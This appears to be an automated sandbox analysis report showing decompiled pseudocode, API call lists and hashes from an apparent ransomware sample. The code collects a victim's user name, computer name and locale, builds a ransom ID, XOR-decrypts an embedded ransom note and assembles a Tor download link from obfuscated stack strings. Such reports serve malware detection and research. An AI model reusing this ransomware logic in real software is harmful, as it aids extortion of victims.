					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0f5870a4
0x0f5870a7
0x0f5870b8
0x0f5870c1
0x0f5870c9
0x0f5870d2
0x0f5870da
0x0f5870da
0x0f5870df
0x0f5870e5
0x0f5870ed
0x0f5870f3
0x0f5870fb
0x0f5870fb
0x0f587101
0x0f587107
0x0f58710f
0x0f587115
0x0f58711d
0x0f58711d
0x0f587123
0x0f587129
0x0f587131
0x0f587137
0x0f58713f
0x0f58713f
0x0f587145
0x0f58714b
0x0f587153
0x0f587159
0x0f587161
0x0f587161
0x0f587167
0x0f58716d
0x0f587175
0x0f58717b
0x0f587183
0x0f587183
0x0f587189
0x0f58718f
0x0f587197
0x0f58719d
0x0f5871a5
0x0f5871a5
0x0f5871ab
0x0f5871b1
0x0f5871b9
0x0f5871bf
0x0f5871c7
0x0f5871c7
0x0f5871cd
0x0f5871d3
0x0f5871db
0x0f5871e1
0x0f5871e9
0x0f5871e9
0x0f5871ef
0x0f5871fc
0x0f587202
0x0f587205
0x0f58720a
0x0f587227
0x0f58720c
0x0f587216
0x0f58721c
0x0f587234
0x0f58723c
0x0f587242
0x0f58724a
0x0f587256
0x0f587256
0x0f587260
0x0f587266
0x0f58726e
0x0f587274
0x0f58727c
0x0f58727c
0x0f587288
0x0f587292

APIs

lstrcatW.KERNEL32 ref: 0F5870C1
lstrcatW.KERNEL32 ref: 0F5870C9
lstrcatW.KERNEL32 ref: 0F5870D2
lstrcatW.KERNEL32 ref: 0F5870DA
lstrcatW.KERNEL32 ref: 0F5870E5
lstrcatW.KERNEL32 ref: 0F5870ED
lstrcatW.KERNEL32 ref: 0F5870F3
lstrcatW.KERNEL32 ref: 0F5870FB
lstrcatW.KERNEL32 ref: 0F587107
lstrcatW.KERNEL32 ref: 0F58710F
lstrcatW.KERNEL32 ref: 0F587115
lstrcatW.KERNEL32 ref: 0F58711D
lstrcatW.KERNEL32 ref: 0F587129
lstrcatW.KERNEL32 ref: 0F587131
lstrcatW.KERNEL32 ref: 0F587137
lstrcatW.KERNEL32 ref: 0F58713F
lstrcatW.KERNEL32 ref: 0F58714B
lstrcatW.KERNEL32 ref: 0F587153
lstrcatW.KERNEL32 ref: 0F587159
lstrcatW.KERNEL32 ref: 0F587161
lstrcatW.KERNEL32 ref: 0F58716D
lstrcatW.KERNEL32 ref: 0F587175
lstrcatW.KERNEL32 ref: 0F58717B
lstrcatW.KERNEL32 ref: 0F587183
lstrcatW.KERNEL32 ref: 0F58718F
lstrcatW.KERNEL32 ref: 0F587197
lstrcatW.KERNEL32 ref: 0F58719D
lstrcatW.KERNEL32 ref: 0F5871A5
lstrcatW.KERNEL32 ref: 0F5871B1
lstrcatW.KERNEL32 ref: 0F5871B9
lstrcatW.KERNEL32 ref: 0F5871BF
lstrcatW.KERNEL32 ref: 0F5871C7
lstrcatW.KERNEL32 ref: 0F5871D3
lstrcatW.KERNEL32 ref: 0F5871DB
lstrcatW.KERNEL32 ref: 0F5871E1
lstrcatW.KERNEL32 ref: 0F5871E9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F584869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F5871FC
wsprintfW.USER32 ref: 0F587216
wsprintfW.USER32 ref: 0F587227
lstrcatW.KERNEL32 ref: 0F587234
lstrcatW.KERNEL32 ref: 0F58723C
lstrcatW.KERNEL32 ref: 0F587242
lstrcatW.KERNEL32 ref: 0F58724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F587256
lstrcatW.KERNEL32 ref: 0F587266
lstrcatW.KERNEL32 ref: 0F58726E
lstrcatW.KERNEL32 ref: 0F587274
lstrcatW.KERNEL32 ref: 0F58727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F584869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58727F

Strings

%x%x, xrefs: 0F587210
undefined, xrefs: 0F587221

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
Instruction ID: 8217b8ec7758a150832e117d2c903c6ddb9c34be0b0b9604d55fddecea25f80f
Opcode Fuzzy Hash: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
Instruction Fuzzy Hash: D6510B31146658B6DB273B618C49FEF3F59FF8A700F060060F9103845A8B699253EFEA

Uniqueness

Uniqueness Score: -1.00%

Function 0F5842B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0F5842B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf592a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F583BC0( &_v148);
				E0F587490( &_v236, __edx); // executed
				_t97 = E0F5872A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F5870A0( &_v152, _t98); // executed
				_t60 = E0F5881F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf590510]");
				_t77 = 0xf592000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf592000) =  *(_t62 + 0xf592000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf592a64 = 0xf592000;
				_t94 = E0F5881F0(0xf592000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf592a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xf592a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0F587D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf592000;
					_t69 =  *0xf592000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xf592000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0f5842c5
0x0f584598
0x0f58459d
0x0f58459d
0x0f5842cb
0x0f5842cc
0x0f5842ce
0x0f5842cf
0x0f5842d4
0x0f5842d6
0x0f5842d7
0x0f5842d9
0x0f5842da
0x0f5842dc
0x0f5842dd
0x0f5842df
0x0f5842e0
0x0f5842e5
0x0f5842e7
0x0f5842e8
0x0f5842f1
0x0f5842fd
0x0f58430e
0x0f584317
0x0f584321
0x0f584327
0x0f584330
0x0f584341
0x0f58433d
0x0f58433d
0x0f58433d
0x0f58434b
0x0f584357
0x0f584363
0x0f584369
0x0f584371
0x0f584376
0x0f58437b
0x0f58437e
0x0f584383
0x0f584390
0x0f584390
0x0f584390
0x0f584393
0x0f584398
0x0f58439c
0x0f5843a1
0x0f5843a1
0x0f5843b0
0x0f5843b0
0x0f5843b7
0x0f5843b8
0x0f5843c4
0x0f5843d8
0x0f5843dc
0x0f584456
0x0f58445d
0x0f584465
0x0f58446d
0x0f584475
0x0f58447d
0x0f584485
0x0f58448d
0x0f584495
0x0f58449d
0x0f5844a5
0x0f5844ad
0x0f5844b5
0x0f5844bd
0x0f5844c5
0x0f5844cd
0x0f5844d5
0x0f5844dd
0x0f5844e5
0x0f5844ed
0x0f5844f5
0x0f5844fd
0x0f584505
0x0f58450d
0x0f584515
0x0f58451d
0x0f584525
0x0f58452d
0x0f584535
0x0f58453d
0x0f584545
0x0f584555
0x0f58455b
0x0f584562
0x0f58456f
0x0f584575
0x0f584562
0x0f584586
0x0f584593
0x00000000
0x0f584593
0x0f5843e0
0x0f5843e0
0x0f5843e2
0x0f5843f4
0x0f5843f8
0x0f5843fd
0x0f584406
0x00000000
0x00000000
0x0f58440a
0x0f58440d
0x0f584413
0x0f584413
0x0f58441b
0x00000000
0x00000000
0x0f584420
0x0f584420
0x0f584426
0x00000000
0x00000000
0x0f584430
0x0f584432
0x0f58443d
0x0f584441
0x00000000
0x00000000
0x00000000
0x0f584441
0x0f584434
0x0f58443b
0x00000000
0x00000000
0x00000000
0x0f58443b
0x0f58459e
0x00000000
0x0f584447
0x0f584447
0x0f584447
0x0f58444b
0x0f58444e
0x0f584451
0x00000000
0x0f584413
0x00000000

APIs

Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C

Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
Part of subcall function 0F587490: GetUserNameW.ADVAPI32 ref: 0F5874C8
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
Part of subcall function 0F587490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
Part of subcall function 0F587490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
Part of subcall function 0F587490: RegCloseKey.KERNEL32(00000000), ref: 0F5875D2

Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584363
lstrcpyW.KERNEL32 ref: 0F5843E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9

Strings

h, xrefs: 0F584525
j, xrefs: 0F5844A5
a, xrefs: 0F584505
o, xrefs: 0F5844DD
t, xrefs: 0F58448D
/, xrefs: 0F5844C5
w, xrefs: 0F584485
w, xrefs: 0F5844F5
d, xrefs: 0F5844ED
ransom_id=, xrefs: 0F584350, 0F58435C
o, xrefs: 0F5844CD
r, xrefs: 0F584495
m, xrefs: 0F58452D
d, xrefs: 0F5844E5
r, xrefs: 0F5844BD
y, xrefs: 0F58451D
., xrefs: 0F5844B5
a, xrefs: 0F584515
{USERID}, xrefs: 0F5843BF, 0F58440D, 0F584413
n, xrefs: 0F58453D
., xrefs: 0F584535
s, xrefs: 0F58446D
/, xrefs: 0F584475
h, xrefs: 0F58445D
w, xrefs: 0F58447D
-, xrefs: 0F58450D
c, xrefs: 0F5844AD
n, xrefs: 0F5844D5
r, xrefs: 0F58449D
t, xrefs: 0F584465
l, xrefs: 0F5844FD

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
Instruction ID: 915bb084315fbe07fc589522136c87c40f4af6723162c7fd71625b339812ff7c
Opcode Fuzzy Hash: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
Instruction Fuzzy Hash: 4B710470504341DBE724EF10D80976B7FE1FB80758F50492CFA856B2A2EBF9954ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0F5843A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F5843A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf592000) =  *(_t41 + 0xf592000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf592a64 = 0xf592000;
				_t60 = E0F5881F0(0xf592000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf592000;
						_t49 =  *0xf592000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf592000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf592a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xf592a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0F587D70( &_a136);
				return _t44;
			}

0x0f5843a6
0x0f5843b0
0x0f5843b0
0x0f5843b7
0x0f5843b8
0x0f5843c4
0x0f5843d8
0x0f5843dc
0x0f5843e0
0x0f5843e0
0x0f5843e2
0x0f5843f4
0x0f5843f8
0x0f5843fd
0x0f584406
0x00000000
0x00000000
0x0f58440a
0x0f58440d
0x0f584413
0x0f584413
0x0f58441b
0x00000000
0x0f584420
0x0f584420
0x0f584420
0x0f584426
0x00000000
0x00000000
0x0f584430
0x0f584432
0x0f58443d
0x0f584441
0x00000000
0x00000000
0x00000000
0x00000000
0x0f584434
0x0f584434
0x0f58443b
0x00000000
0x00000000
0x00000000
0x00000000
0x0f58443b
0x00000000
0x0f584432
0x0f58459e
0x00000000
0x0f58459e
0x00000000
0x0f584447
0x0f584447
0x0f584447
0x0f58444b
0x0f58444e
0x0f584451
0x00000000
0x0f584413
0x0f5843e0
0x0f584456
0x0f58445d
0x0f584465
0x0f58446d
0x0f584475
0x0f58447d
0x0f584485
0x0f58448d
0x0f584495
0x0f58449d
0x0f5844a5
0x0f5844ad
0x0f5844b5
0x0f5844bd
0x0f5844c5
0x0f5844cd
0x0f5844d5
0x0f5844dd
0x0f5844e5
0x0f5844ed
0x0f5844f5
0x0f5844fd
0x0f584505
0x0f58450d
0x0f584515
0x0f58451d
0x0f584525
0x0f58452d
0x0f584535
0x0f58453d
0x0f584545
0x0f584555
0x0f58455b
0x0f584562
0x0f58456f
0x0f584575
0x0f584562
0x0f584586
0x0f584593
0x0f58459d

APIs

lstrcpyW.KERNEL32 ref: 0F5843E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F584555
wsprintfW.USER32 ref: 0F58456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F584586

Strings

h, xrefs: 0F584525
j, xrefs: 0F5844A5
a, xrefs: 0F584505
o, xrefs: 0F5844DD
t, xrefs: 0F58448D
/, xrefs: 0F5844C5
w, xrefs: 0F584485
w, xrefs: 0F5844F5
d, xrefs: 0F5844ED
o, xrefs: 0F5844CD
r, xrefs: 0F584495
m, xrefs: 0F58452D
d, xrefs: 0F5844E5
r, xrefs: 0F5844BD
y, xrefs: 0F58451D
a, xrefs: 0F584515
., xrefs: 0F5844B5
{USERID}, xrefs: 0F5843BF, 0F58440D, 0F584413
n, xrefs: 0F58453D
., xrefs: 0F584535
s, xrefs: 0F58446D
/, xrefs: 0F584475
h, xrefs: 0F58445D
w, xrefs: 0F58447D
-, xrefs: 0F58450D
c, xrefs: 0F5844AD
n, xrefs: 0F5844D5
r, xrefs: 0F58449D
t, xrefs: 0F584465
l, xrefs: 0F5844FD

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
Instruction ID: 0d40faeccb505d06215e6cf63961f3fbd80ded84db50686b87d8619f31c442a3
Opcode Fuzzy Hash: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
Instruction Fuzzy Hash: B441A270509341DBD724EF10D54832ABFE2FB80759F50492CFA886B262D7FA859ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 0F582960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0F582960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F5882B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
